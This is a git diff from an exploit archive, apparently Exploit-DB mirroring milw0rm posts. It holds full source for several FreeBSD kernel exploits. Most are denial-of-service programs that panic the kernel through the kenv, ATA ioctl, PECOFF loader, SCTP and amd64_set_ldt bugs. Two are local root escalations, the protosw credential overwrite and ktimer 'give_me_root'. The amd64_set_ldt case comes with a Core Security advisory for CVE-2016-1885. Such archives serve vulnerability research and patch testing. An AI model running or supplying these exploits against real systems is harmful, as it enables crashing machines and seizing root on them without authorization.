 print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
 print "\n Command: SCAN URL HELP QUIT";
 print "\n\n\n\n\n\n\n\n\n\n\n";
-};
-
-# milw0rm.com [2005-05-04]
+};
+
+# milw0rm.com [2005-05-04]
diff --git a/platforms/freebsd/dos/8259.c b/platforms/freebsd/dos/8259.c
index a7664d51a..7ef17fbc0 100755
--- a/platforms/freebsd/dos/8259.c
+++ b/platforms/freebsd/dos/8259.c
@@ -1,10 +1,10 @@
-/* FreeBSD 7.x local kernel panic as mentioned in Errata Notice 09:01
-http://security.freebsd.org/advisories/FreeBSD-EN-09:01.kenv.asc,
-kokanin@gmail */
-#include
-#include
-void main(){
-kenv(KENV_DUMP,NULL,123123123,123123123);
-}
-
-// milw0rm.com [2009-03-23]
+/* FreeBSD 7.x local kernel panic as mentioned in Errata Notice 09:01
+http://security.freebsd.org/advisories/FreeBSD-EN-09:01.kenv.asc,
+kokanin@gmail */
+#include
+#include
+void main(){
+kenv(KENV_DUMP,NULL,123123123,123123123);
+}
+
+// milw0rm.com [2009-03-23]
diff --git a/platforms/freebsd/dos/9134.c b/platforms/freebsd/dos/9134.c
index cbe81c7d7..6c94529a2 100755
--- a/platforms/freebsd/dos/9134.c
+++ b/platforms/freebsd/dos/9134.c
@@ -1,58 +1,58 @@
-/* atapanic.c
- *
- * by Shaun Colley, 13 July 2009
- *
- * this panics the freebsd kernel by passing a large value to malloc(9) in one of
- * fbsd's ata ioctl's. tested on freebsd 6.0 and 8.0. you need read access to the
- * ata device in /dev to be able to open() the device. chain with some race condition
- * bug?
- *
- * - shaun
- *
- */
-
-
-#include
-#include
-#include
-#include
-
-struct ata_ioc_requestz {
- union {
- struct {
- u_int8_t command;
- u_int8_t feature;
- u_int64_t lba;
- u_int16_t count;
- } ata;
- struct {
- char ccb[16];
- } atapi;
- } u;
-
- caddr_t data;
- int count;
- int flags;
-
- int timeout;
- int error;
-};
-
-
-#define IOCATAREQUEST _IOWR('a', 100, struct ata_ioc_requestz)
-
-int main() {
-
-struct ata_ioc_requestz evil;
-int fd;
-
-evil.count = 0xffffffff;
-fd = open("/dev/acd0", O_RDONLY); /* /dev/acd0 is one of my ata devices */
-
-ioctl(fd, IOCATAREQUEST, &evil);
-
-/* should never reach here if kernel panics */
-return 0;
-}
-
-// milw0rm.com [2009-07-13]
+/* atapanic.c
+ *
+ * by Shaun Colley, 13 July 2009
+ *
+ * this panics the freebsd kernel by passing a large value to malloc(9) in one of
+ * fbsd's ata ioctl's. tested on freebsd 6.0 and 8.0. you need read access to the
+ * ata device in /dev to be able to open() the device. chain with some race condition
+ * bug?
+ *
+ * - shaun
+ *
+ */
+
+
+#include
+#include
+#include
+#include
+
+struct ata_ioc_requestz {
+ union {
+ struct {
+ u_int8_t command;
+ u_int8_t feature;
+ u_int64_t lba;
+ u_int16_t count;
+ } ata;
+ struct {
+ char ccb[16];
+ } atapi;
+ } u;
+
+ caddr_t data;
+ int count;
+ int flags;
+
+ int timeout;
+ int error;
+};
+
+
+#define IOCATAREQUEST _IOWR('a', 100, struct ata_ioc_requestz)
+
+int main() {
+
+struct ata_ioc_requestz evil;
+int fd;
+
+evil.count = 0xffffffff;
+fd = open("/dev/acd0", O_RDONLY); /* /dev/acd0 is one of my ata devices */
+
+ioctl(fd, IOCATAREQUEST, &evil);
+
+/* should never reach here if kernel panics */
+return 0;
+}
+
+// milw0rm.com [2009-07-13]
diff --git a/platforms/freebsd/dos/9206.c b/platforms/freebsd/dos/9206.c
index d44f9b53f..7eef0666d 100755
--- a/platforms/freebsd/dos/9206.c
+++ b/platforms/freebsd/dos/9206.c
@@ -1,41 +1,41 @@
-/* pecoff_panic.c
- *
- * by Shaun Colley, 20 July 2009
- *
- * this code will panic the freebsd kernel due to a bug in the PECOFF executable loader
- * code ('options PECOFF_SUPPORT' in kernel config or `kldload pecoff`)
- *
- * panic(9) is in vm_fault due to a page fault. the panic seems to be caused in
- * generic_bcopy...probably hitting a guard page..maybe exploitable(??) but this is just
- * a DoS at the moment :) (ugly code btw)
- *
- * tested on freebsd 7.2-RELEASE
- *
- * - shaun
- */
-
-#include
-#include
-#include
-#include
-
-int main() {
-int i, fd;
-system("rm -rf evilprog.exe; touch evilprog.exe");
-fd = open("evilprog.exe", O_WRONLY);
-char buf[0x3a+2+0x04+4000];
-buf[0] = 'M';
-buf[1] = 'Z'; /* magic */
-for(i = 2; i<0x3c; i++) buf[i] = 'a';
-buf[0x3c] = 0xee;
-buf[0x3d] = 0xee;
-buf[0x3e] = 0xee;
-buf[0x3f] = 0xee;
-for(i = 0x40; i<(0x40+4000); i++) buf[i] = 0x61;
-write(fd, buf, 0x3a+2+0x04+4000);
-close(fd);
-system("chmod 700 evilprog.exe");
-system("./evilprog.exe"); /* run the dodgy PECOFF binary */
-}
-
-// milw0rm.com [2009-07-20]
+/* pecoff_panic.c
+ *
+ * by Shaun Colley, 20 July 2009
+ *
+ * this code will panic the freebsd kernel due to a bug in the PECOFF executable loader
+ * code ('options PECOFF_SUPPORT' in kernel config or `kldload pecoff`)
+ *
+ * panic(9) is in vm_fault due to a page fault. the panic seems to be caused in
+ * generic_bcopy...probably hitting a guard page..maybe exploitable(??) but this is just
+ * a DoS at the moment :) (ugly code btw)
+ *
+ * tested on freebsd 7.2-RELEASE
+ *
+ * - shaun
+ */
+
+#include
+#include
+#include
+#include
+
+int main() {
+int i, fd;
+system("rm -rf evilprog.exe; touch evilprog.exe");
+fd = open("evilprog.exe", O_WRONLY);
+char buf[0x3a+2+0x04+4000];
+buf[0] = 'M';
+buf[1] = 'Z'; /* magic */
+for(i = 2; i<0x3c; i++) buf[i] = 'a';
+buf[0x3c] = 0xee;
+buf[0x3d] = 0xee;
+buf[0x3e] = 0xee;
+buf[0x3f] = 0xee;
+for(i = 0x40; i<(0x40+4000); i++) buf[i] = 0x61;
+write(fd, buf, 0x3a+2+0x04+4000);
+close(fd);
+system("chmod 700 evilprog.exe");
+system("./evilprog.exe"); /* run the dodgy PECOFF binary */
+}
+
+// milw0rm.com [2009-07-20]
diff --git a/platforms/freebsd/dos/9373.c b/platforms/freebsd/dos/9373.c
index d1e65f586..9e9c00497 100755
--- a/platforms/freebsd/dos/9373.c
+++ b/platforms/freebsd/dos/9373.c
@@ -1,75 +1,75 @@
-/* fbsd-sctp-panic.c
- *
- * freebsd 7.2-RELEASE SCTP local kernel DoS (kern panic)
- * only tested on 7.2-RELEASE, probably older and newer builds are vuln. as well
- * based on an unfixed bug found here:
- *
- * by Shaun Colley , Wed 05 Aug 2009
- *
- * $ gcc fbsd-sctp-panic.c -o fbsd-sctp-panic && ./fbsd-sctp-panic
- * wait a few seconds..
- *
- * - shaun
- */
-
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-int csock, sock, lsock;
-
-void *accept_connection() {
- struct sockaddr_in sin;
- socklen_t size = sizeof(sin);
-
- sin.sin_family = AF_INET;
- sin.sin_addr.s_addr = htonl(0x7f000001);
- sin.sin_port = htons(1337);
-
- sock = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
- bind(sock, (struct sockaddr *)&sin, sizeof(sin));
- listen(sock, 1);
- lsock = accept(sock, (struct sockaddr *)&sin, &size);
-}
-
-void recvdata() {
- int flag;
- struct sctp_sndrcvinfo recvinfo;
- char buf[10];
- sctp_recvmsg(csock, buf, sizeof(buf), NULL, 0, &recvinfo, &flag);
-}
-
-void make_connection() {
- struct sockaddr_in consin;
- struct sctp_sndrcvinfo sinfo;
-
- csock = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
- consin.sin_family = AF_INET;
- consin.sin_addr.s_addr = htonl(0x7f000001);
- consin.sin_port = htons(1337);
-
- connect(csock, (struct sockaddr *)&consin, sizeof(consin));
- signal(SIGALRM, recvdata);
- sinfo.sinfo_stream = 1337;
- sctp_send(lsock, "pwned", sizeof("pwned"), &sinfo, 0);
-}
-
-
-int main() {
-
- alarm(2);
- signal(SIGALRM, make_connection);
- accept_connection();
-
- return 0;
-}
-
-// milw0rm.com [2009-08-06]
+/* fbsd-sctp-panic.c
+ *
+ * freebsd 7.2-RELEASE SCTP local kernel DoS (kern panic)
+ * only tested on 7.2-RELEASE, probably older and newer builds are vuln. as well
+ * based on an unfixed bug found here:
+ *
+ * by Shaun Colley , Wed 05 Aug 2009
+ *
+ * $ gcc fbsd-sctp-panic.c -o fbsd-sctp-panic && ./fbsd-sctp-panic
+ * wait a few seconds..
+ *
+ * - shaun
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+int csock, sock, lsock;
+
+void *accept_connection() {
+ struct sockaddr_in sin;
+ socklen_t size = sizeof(sin);
+
+ sin.sin_family = AF_INET;
+ sin.sin_addr.s_addr = htonl(0x7f000001);
+ sin.sin_port = htons(1337);
+
+ sock = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
+ bind(sock, (struct sockaddr *)&sin, sizeof(sin));
+ listen(sock, 1);
+ lsock = accept(sock, (struct sockaddr *)&sin, &size);
+}
+
+void recvdata() {
+ int flag;
+ struct sctp_sndrcvinfo recvinfo;
+ char buf[10];
+ sctp_recvmsg(csock, buf, sizeof(buf), NULL, 0, &recvinfo, &flag);
+}
+
+void make_connection() {
+ struct sockaddr_in consin;
+ struct sctp_sndrcvinfo sinfo;
+
+ csock = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
+ consin.sin_family = AF_INET;
+ consin.sin_addr.s_addr = htonl(0x7f000001);
+ consin.sin_port = htons(1337);
+
+ connect(csock, (struct sockaddr *)&consin, sizeof(consin));
+ signal(SIGALRM, recvdata);
+ sinfo.sinfo_stream = 1337;
+ sctp_send(lsock, "pwned", sizeof("pwned"), &sinfo, 0);
+}
+
+
+int main() {
+
+ alarm(2);
+ signal(SIGALRM, make_connection);
+ accept_connection();
+
+ return 0;
+}
+
+// milw0rm.com [2009-08-06]
diff --git a/platforms/freebsd/local/7581.c b/platforms/freebsd/local/7581.c
index 7f6eca0af..6700784bb 100755
--- a/platforms/freebsd/local/7581.c
+++ b/platforms/freebsd/local/7581.c
@@ -1,144 +1,144 @@
-/*
- * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
- * defined here:
- * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
- *
- * This will overwrite your credential structure in the kernel. This will
- * affect more than just the exploit's process, which is why this doesn't
- * spawn a shell. When the exploit has finished, your login shell should
- * have euid=0.
- *
- * Enjoy, and happy holidays!
- * - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
- */
-
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-#define PAGES 1
-#define PATTERN1 0x8f8f8f8f
-#define PATTERN2 0x6e6e6e6e
-
-typedef unsigned long ulong;
-typedef unsigned char uchar;
-
-int
-x(void)
-{
- struct proc * p = (struct proc * )PATTERN1;
- uint * i;
-
- while(1)
- {
- if(p->p_pid == PATTERN2)
- {
- i = (uint * )p->p_ucred;
- *++i = 0;
- break;
- }
-
- p = p->p_list.le_next;
- }
-
- return 1;
-}
-
-int
-main(int argc, char * argv[])
-{
- ulong addr;
- uchar * c;
- uchar * d;
- uint * i;
- void * v;
- int pid;
- int s;
-
- if(argc != 2)
- {
- fprintf(stderr, "usage: ./x \n");
- return 1;
- }
-
- addr = strtoul(argv[1], 0, 0);
-
- v = mmap(
- NULL,
- (PAGES*PAGE_SIZE),
- PROT_READ|PROT_WRITE|PROT_EXEC,
- MAP_ANON|MAP_FIXED,
- -1,
- 0);
- if(v == MAP_FAILED)
- {
- perror("mmap");
- return 0;
- }
-
- c = v;
- d = (uchar * )x;
- while(1)
- {
- *c = *d;
- if(*d == 0xc3)
- {
- break;
- }
-
- d++;
- c++;
- }
-
- *c++ = 0xc3;
-
- c = v;
- while(1)
- {
- if(*(long * )c == PATTERN1)
- {
- *(c + 0) = addr >> 0;
- *(c + 1) = addr >> 8;
- *(c + 2) = addr >> 16;
- *(c + 3) = addr >> 24;
- break;
- }
- c++;
- }
-
- pid = getpid();
- while(1)
- {
- if(*(long * )c == PATTERN2)
- {
- *(c + 0) = pid >> 0;
- *(c + 1) = pid >> 8;
- *(c + 2) = pid >> 16;
- *(c + 3) = pid >> 24;
- break;
- }
- c++;
- }
-
- s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
- if(s < 0)
- {
- perror("socket");
- return 1;
- }
-
- shutdown(s, SHUT_RDWR);
-
- return 0;
-}
-
-// milw0rm.com [2008-12-28]
+/*
+ * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
+ * defined here:
+ * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
+ *
+ * This will overwrite your credential structure in the kernel. This will
+ * affect more than just the exploit's process, which is why this doesn't
+ * spawn a shell. When the exploit has finished, your login shell should
+ * have euid=0.
+ *
+ * Enjoy, and happy holidays!
+ * - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define PAGES 1
+#define PATTERN1 0x8f8f8f8f
+#define PATTERN2 0x6e6e6e6e
+
+typedef unsigned long ulong;
+typedef unsigned char uchar;
+
+int
+x(void)
+{
+ struct proc * p = (struct proc * )PATTERN1;
+ uint * i;
+
+ while(1)
+ {
+ if(p->p_pid == PATTERN2)
+ {
+ i = (uint * )p->p_ucred;
+ *++i = 0;
+ break;
+ }
+
+ p = p->p_list.le_next;
+ }
+
+ return 1;
+}
+
+int
+main(int argc, char * argv[])
+{
+ ulong addr;
+ uchar * c;
+ uchar * d;
+ uint * i;
+ void * v;
+ int pid;
+ int s;
+
+ if(argc != 2)
+ {
+ fprintf(stderr, "usage: ./x \n");
+ return 1;
+ }
+
+ addr = strtoul(argv[1], 0, 0);
+
+ v = mmap(
+ NULL,
+ (PAGES*PAGE_SIZE),
+ PROT_READ|PROT_WRITE|PROT_EXEC,
+ MAP_ANON|MAP_FIXED,
+ -1,
+ 0);
+ if(v == MAP_FAILED)
+ {
+ perror("mmap");
+ return 0;
+ }
+
+ c = v;
+ d = (uchar * )x;
+ while(1)
+ {
+ *c = *d;
+ if(*d == 0xc3)
+ {
+ break;
+ }
+
+ d++;
+ c++;
+ }
+
+ *c++ = 0xc3;
+
+ c = v;
+ while(1)
+ {
+ if(*(long * )c == PATTERN1)
+ {
+ *(c + 0) = addr >> 0;
+ *(c + 1) = addr >> 8;
+ *(c + 2) = addr >> 16;
+ *(c + 3) = addr >> 24;
+ break;
+ }
+ c++;
+ }
+
+ pid = getpid();
+ while(1)
+ {
+ if(*(long * )c == PATTERN2)
+ {
+ *(c + 0) = pid >> 0;
+ *(c + 1) = pid >> 8;
+ *(c + 2) = pid >> 16;
+ *(c + 3) = pid >> 24;
+ break;
+ }
+ c++;
+ }
+
+ s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
+ if(s < 0)
+ {
+ perror("socket");
+ return 1;
+ }
+
+ shutdown(s, SHUT_RDWR);
+
+ return 0;
+}
+
+// milw0rm.com [2008-12-28]
diff --git a/platforms/freebsd/local/8261.c b/platforms/freebsd/local/8261.c
index 04442f565..1672ef312 100755
--- a/platforms/freebsd/local/8261.c
+++ b/platforms/freebsd/local/8261.c
@@ -1,130 +1,130 @@
-/* bsd-ktimer.c
- *
- * Copyright (c) 2008 by
- *
- * FreeBSD >= 7.0 local kernel root exploit
- * by christer/mu-b - Mon 2 June 2008
- *
- * - Tested on: FreeBSD 7.0
- * FreeBSD 7.1
- *
- * - Private Source Code -DO NOT DISTRIBUTE -
- * http://www.bsdcitizen.org/ -- BSDCITIZEN 2008!@$!
- */
-
-#define _KERNEL
-
-#include
-#include
-
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-#include
-#include
-#include
-#include
-#include
-
-#define ITPSIZE 0x08000000
-#define LOOKUP 0xD0000000
-
-/* some prototypes to prevent compiler bitching */
-int ktimer_create(int, int, int *);
-int ktimer_delete(int);
-int kldsym(int, int, void *);
-
-static void
-give_me_root()
-{
- struct thread *thread;
- asm("movl %%fs:0,%0": "=r"(thread));
- thread->td_proc->p_ucred->cr_uid=0;
-}
-
-int
-main (int argc, char **argv)
-{
- struct itimer **itp_page, *it_page;
- struct kld_sym_lookup ksym;
- void *zpage[16];
- int i, r;
-
- printf ("FreeBSD local kernel root exploit\n"
- "by: christer/mu-b\n"
- "http://www.bsdcitizen.org/ -- BSDCITIZEN 2008!@$!\n\n");
-
- itp_page = mmap (0, ITPSIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON, -1, 0);
- if (itp_page < 0)
- {
- fprintf (stderr, "%s: failed to mmap %d-bytes\n",
- argv[0], ITPSIZE);
- exit (EXIT_FAILURE);
- }
-
- printf ("* allocated pointer page: 0x%08X -> 0x%08X [%d-bytes]\n",
- (int) itp_page, (int) itp_page + ITPSIZE, ITPSIZE);
-
- it_page = mmap (itp_page + ITPSIZE, sizeof (struct itimer),
- PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON, -1, 0);
- if (it_page < 0)
- {
- fprintf (stderr, "%s: failed to mmap %d-bytes\n",
- argv[0], sizeof (struct itimer));
- exit (EXIT_FAILURE);
- }
-
- printf ("* allocated itimer struct: 0x%08X -> 0x%08X [%d-bytes]\n",
- (int) it_page, (int) it_page + sizeof (struct itimer), sizeof (struct itimer));
-
- printf ("* filling pointer page... ");
- fflush (stdout);
-
- for (i = 0; i < ITPSIZE / sizeof (struct itimer *); i++)
- itp_page[i] = it_page;
- printf ("done\n");
-
- ksym.version = sizeof(ksym);
- ksym.symname = "posix_clocks";
-
- if (kldsym(0,KLDSYM_LOOKUP,&ksym) < 0)
- {
- fprintf (stderr, "%s: failed to lookup posix_clocks\n", argv[0]);
- exit (EXIT_FAILURE);
- }
-
- printf("* found posix_clocks @ [0x%x]\n",(unsigned )ksym.symvalue);
-
- for (i = 0; i < 16; i++)
- zpage[i] = (void *) give_me_root;
-
- memset (it_page, 0, sizeof (struct itimer));
- /* DIRTY REPLACE WITH EXACT STRUCTURE MEMBER */
- for (i = 0; i < 10; i++)
- ((unsigned int *) it_page)[i] = 4;
-
- it_page->it_flags = 0x00;
- it_page->it_usecount = 0;
- it_page->it_clockid = ((int) &zpage[8] - ksym.symvalue) / 20;
-
- printf ("* it_page->it_clockid: 0x%08X [access @0x%08X]\n",
- it_page->it_clockid,(unsigned )&zpage[8]);
- printf ("* ktimer_delete (0x%08X)\n", LOOKUP);
-
- sleep (2);
- ktimer_create (0, 0, &i);
- r = ktimer_delete (LOOKUP);
-
- printf ("* ktimer_delete: %d %d\n", r, it_page->it_flags);
-
- return (EXIT_SUCCESS);
-}
-
-// milw0rm.com [2009-03-23]
+/* bsd-ktimer.c
+ *
+ * Copyright (c) 2008 by
+ *
+ * FreeBSD >= 7.0 local kernel root exploit
+ * by christer/mu-b - Mon 2 June 2008
+ *
+ * - Tested on: FreeBSD 7.0
+ * FreeBSD 7.1
+ *
+ * - Private Source Code -DO NOT DISTRIBUTE -
+ * http://www.bsdcitizen.org/ -- BSDCITIZEN 2008!@$!
+ */
+
+#define _KERNEL
+
+#include
+#include
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include
+#include
+#include
+#include
+#include
+
+#define ITPSIZE 0x08000000
+#define LOOKUP 0xD0000000
+
+/* some prototypes to prevent compiler bitching */
+int ktimer_create(int, int, int *);
+int ktimer_delete(int);
+int kldsym(int, int, void *);
+
+static void
+give_me_root()
+{
+ struct thread *thread;
+ asm("movl %%fs:0,%0": "=r"(thread));
+ thread->td_proc->p_ucred->cr_uid=0;
+}
+
+int
+main (int argc, char **argv)
+{
+ struct itimer **itp_page, *it_page;
+ struct kld_sym_lookup ksym;
+ void *zpage[16];
+ int i, r;
+
+ printf ("FreeBSD local kernel root exploit\n"
+ "by: christer/mu-b\n"
+ "http://www.bsdcitizen.org/ -- BSDCITIZEN 2008!@$!\n\n");
+
+ itp_page = mmap (0, ITPSIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON, -1, 0);
+ if (itp_page < 0)
+ {
+ fprintf (stderr, "%s: failed to mmap %d-bytes\n",
+ argv[0], ITPSIZE);
+ exit (EXIT_FAILURE);
+ }
+
+ printf ("* allocated pointer page: 0x%08X -> 0x%08X [%d-bytes]\n",
+ (int) itp_page, (int) itp_page + ITPSIZE, ITPSIZE);
+
+ it_page = mmap (itp_page + ITPSIZE, sizeof (struct itimer),
+ PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON, -1, 0);
+ if (it_page < 0)
+ {
+ fprintf (stderr, "%s: failed to mmap %d-bytes\n",
+ argv[0], sizeof (struct itimer));
+ exit (EXIT_FAILURE);
+ }
+
+ printf ("* allocated itimer struct: 0x%08X -> 0x%08X [%d-bytes]\n",
+ (int) it_page, (int) it_page + sizeof (struct itimer), sizeof (struct itimer));
+
+ printf ("* filling pointer page... ");
+ fflush (stdout);
+
+ for (i = 0; i < ITPSIZE / sizeof (struct itimer *); i++)
+ itp_page[i] = it_page;
+ printf ("done\n");
+
+ ksym.version = sizeof(ksym);
+ ksym.symname = "posix_clocks";
+
+ if (kldsym(0,KLDSYM_LOOKUP,&ksym) < 0)
+ {
+ fprintf (stderr, "%s: failed to lookup posix_clocks\n", argv[0]);
+ exit (EXIT_FAILURE);
+ }
+
+ printf("* found posix_clocks @ [0x%x]\n",(unsigned )ksym.symvalue);
+
+ for (i = 0; i < 16; i++)
+ zpage[i] = (void *) give_me_root;
+
+ memset (it_page, 0, sizeof (struct itimer));
+ /* DIRTY REPLACE WITH EXACT STRUCTURE MEMBER */
+ for (i = 0; i < 10; i++)
+ ((unsigned int *) it_page)[i] = 4;
+
+ it_page->it_flags = 0x00;
+ it_page->it_usecount = 0;
+ it_page->it_clockid = ((int) &zpage[8] - ksym.symvalue) / 20;
+
+ printf ("* it_page->it_clockid: 0x%08X [access @0x%08X]\n",
+ it_page->it_clockid,(unsigned )&zpage[8]);
+ printf ("* ktimer_delete (0x%08X)\n", LOOKUP);
+
+ sleep (2);
+ ktimer_create (0, 0, &i);
+ r = ktimer_delete (LOOKUP);
+
+ printf ("* ktimer_delete: %d %d\n", r, it_page->it_flags);
+
+ return (EXIT_SUCCESS);
+}
+
+// milw0rm.com [2009-03-23]
diff --git a/platforms/freebsd_x86-64/dos/39570.c b/platforms/freebsd_x86-64/dos/39570.c
new file mode 100755
index 000000000..7598103c6
--- /dev/null
+++ b/platforms/freebsd_x86-64/dos/39570.c
@@ -0,0 +1,227 @@ +/* + +1. Advisory Information + +Title: FreeBSD Kernel amd64_set_ldt Heap Overflow +Advisory ID: CORE-2016-0005 +Advisory URL: http://www.coresecurity.com/content/freebsd-kernel-amd64_set_ldt-heap-overflow +Date published: 2016-03-16 +Date of last update: 2016-03-14 +Vendors contacted: FreeBSD +Release mode: Coordinated release + +2. Vulnerability Information + +Class: Unsigned to Signed Conversion Error [CWE-196] +Impact: Denial of service +Remotely Exploitable: No +Locally Exploitable: Yes +CVE Name: CVE-2016-1885 + + + +3. Vulnerability Description + +FreeBSD is an advanced computer operating system used to power modern servers, desktops and embedded platforms. A large community has continually developed it for more than thirty years. Its advanced networking, security and storage features have made FreeBSD the platform of choice for many of the busiest web sites and most pervasive embedded networking and storage devices. + +An integer signedness error has been found in the amd64_set_ldt() function in the FreeBSD kernel code (defined in the /sys/amd64/amd64/sys_machdep.c file), which implements the i386_set_ldt system call on the amd64 version of the OS. This integer signedness issue ultimately leads to a heap overflow in the kernel, allowing local unprivileged attackers to crash the system. + +4. Vulnerable packages + +FreeBSD 10.2 amd64. +Other amd64 versions may be affected too but they were no checked. +5. Non-vulnerable packages + +FreeBSD 10.2-RELENG. +6. Vendor Information, Solutions and Workarounds + +The FreeBSD team has released patches for the reported vulnerabilities. You should upgrade to FreeBSD 10.2-RELENG. + +7. Credits + +This vulnerability was discovered and researched by Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team. + + + +8. Technical Description / Proof of Concept Code + +8.1. 
FreeBSD amd64_set_ldt Integer Signedness Vulnerability + +[CVE-2016-1885] FreeBSD exposes the i386_set_ldt[1] architecture-dependent system call for its Intel i386 version. This system call can be used to manage i386 per-process Local Descriptor Table (LDT) entries. The amd64 version of FreeBSD still exposes this system call for 32-bit applications running on the 64-bit version of the OS. + +Architecture-specific system calls are handled by the FreeBSD kernel in the sysarch() function, which is defined in the /sys/amd64/amd64/sys_machdep.c[2] file: + +int +sysarch(td, uap) + struct thread *td; + register struct sysarch_args *uap; +{ +[...] +if (uap->op == I386_GET_LDT || uap->op == I386_SET_LDT) + return (sysarch_ldt(td, uap, UIO_USERSPACE)); +[...] + +As we can see in the code snippet above, if the system call being invoked is either I386_GET_LDT or I386_SET_LDT, then the sysarch_ldt() function is called. The following code excerpt shows the part of the sysarch_ldt() function that is in charge of handling the I386_SET_LDT syscall: + +int +sysarch_ldt(struct thread *td, struct sysarch_args *uap, int uap_space) +{ +struct i386_ldt_args *largs, la; +struct user_segment_descriptor *lp; +[...] +switch (uap->op) { + [...] 
+ case I386_SET_LDT: + if (largs->descs != NULL && largs->num > max_ldt_segment) + return (EINVAL); + set_pcb_flags(td->td_pcb, PCB_FULL_IRET); + if (largs->descs != NULL) { + lp = malloc(largs->num * sizeof(struct + user_segment_descriptor), M_TEMP, M_WAITOK); + error = copyin(largs->descs, lp, largs->num * + sizeof(struct user_segment_descriptor)); + if (error == 0) + error = amd64_set_ldt(td, largs, lp); + free(lp, M_TEMP); + } else { + error = amd64_set_ldt(td, largs, NULL); + } + break; + +The largs variable that can be seen there is a pointer to an i386_ldt_args structure, which is defined as follows in the /sys/x86/include/sysarch.h[3] file: + +struct i386_ldt_args { + unsigned int start; + union descriptor *descs; + unsigned int num; +}; + +Note that all of the fields of the i386_ldt_args structure are fully user-controlled: they match the 3 arguments specified by the user when i386_set_ldt() was called from user mode: + +int i386_set_ldt(int start_sel, union descriptor *descs, int num_sels); + +From the sysarch_ldt() snippet above we can see that if we call i386_set_ldt() from user mode specifying a NULL pointer as the second argument (largs->descs), then it will end up calling the amd64_set_ldt() function, passing the largs variable as the second argument, and a NULL pointer as the third argument. This is the prototype of the amd64_set_ldt() function being called: + +int +amd64_set_ldt(struct thread *td, struct i386_ldt_args *uap, struct user_segment_descriptor *descs); + +amd64_set_ldt() is the vulnerable function here. Since it is being called with its third argument (the descs pointer) set to NULL, the following code path will be executed (remember that every field in the i386_ldt_args structure pointed by the uap pointer is fully controlled from user mode): + + int + amd64_set_ldt(td, uap, descs) + struct thread *td; + struct i386_ldt_args *uap; + struct user_segment_descriptor *descs; + { + [...] + int largest_ld; + [...] 
+608 if (descs == NULL) { +609 Free descriptors +610 if (uap->start == 0 && uap->num == 0) +611 uap->num = max_ldt_segment; +612 if (uap->num == 0) +613 return (EINVAL); +614 if ((pldt = mdp->md_ldt) == NULL || +615 uap->start >= max_ldt_segment) +616 return (0); +617 largest_ld = uap->start + uap->num; +618 if (largest_ld > max_ldt_segment) +619 largest_ld = max_ldt_segment; +620 i = largest_ld - uap->start; +621 mtx_lock(&dt_lock); +622 bzero(&((struct user_segment_descriptor *)(pldt->ldt_base)) +623 [uap->start], sizeof(struct user_segment_descriptor) * i); +624 mtx_unlock(&dt_lock); +625 return (0); +626 } + +The two if statements at lines 610 and 612 perform some sanity checks against uap->start and uap->num, which can be avoided by setting uap->num to a value different than 0. The next check at lines 614/615 will cause the function to exit early if the mdp->md_ldt pointer is NULL, or if uap->start is greater or equal than max_ldt_segment (1024). Having mdp->md_ldt holding a non-NULL value can be achieved by adding an initial entry to the process LDT before triggering the bug, like this: + + struct segment_descriptor desc = {0, 0, SDT_MEMRW, SEL_UPL, 1, 0, 0, 1, 0 ,0}; + i386_set_ldt(LDT_AUTO_ALLOC, (union descriptor *) &desc, 1); + +After passing those checks we reach the vulnerable code at lines 617-619: + +617 largest_ld = uap->start + uap->num; +618 if (largest_ld > max_ldt_segment) +619 largest_ld = max_ldt_segment; +620 i = largest_ld - uap->start; + +Note that largest_ld is a signed int that will hold the sum of uap->start + uap->num. The code at lines 618-619 tries to ensure that largest_ld is not greater than max_ldt_segment (1024); however, being largest_ld a signed integer holding a value fully controlled from user mode, it will perform a signed comparison that can be bypassed by setting uap->num to a negative number. 
+ +This signedness error will ultimately lead to a heap overflow in the FreeBSD kernel when the bzero() function is later called with a huge value as its len parameter: + +622 bzero(&((struct user_segment_descriptor *)(pldt->ldt_base)) +623 [uap->start], sizeof(struct user_segment_descriptor) * i); + +8.2. Proof of Concept + +The following Proof-of-Concept code reproduces the vulnerability in a default FreeBSD 10.2-RELEASE-amd64 installation running a GENERIC kernel: + +*/ + +/* $ clang amd64_set_ldt.c -o amd64_set_ldt -m32 */ + +#include +#include +#include +#include +#include +#include + + +int main(int argc, char **argv){ + + int res; + + struct segment_descriptor desc = {0, 0, SDT_MEMRW, SEL_UPL, 1, 0, 0, 1, 0 ,0}; + + printf("[+] Adding an initial entry to the process LDT...\n"); + res = i386_set_ldt(LDT_AUTO_ALLOC, (union descriptor *) &desc, 1); + if (res < 0){ + err(EX_OSERR, "i386_set_ldt(LDT_AUTO_ALLOC)"); + } + printf("returned index: %d\n", res); + + printf("Triggering the bug...\n"); + res = i386_set_ldt(1, NULL, 0x80000000); +} + +/* + +9. Report Timeline + +2016-03-02: Core Security sent an initial notification to FreeBSD. +2016-03-02: FreeBSD confirmed reception of our email and requested we sent them a draft version of the advisory. +2016-03-02: Core Security sent FreeBSD a draft version of the advisory. We requested them to let us know once they finished reviewing the 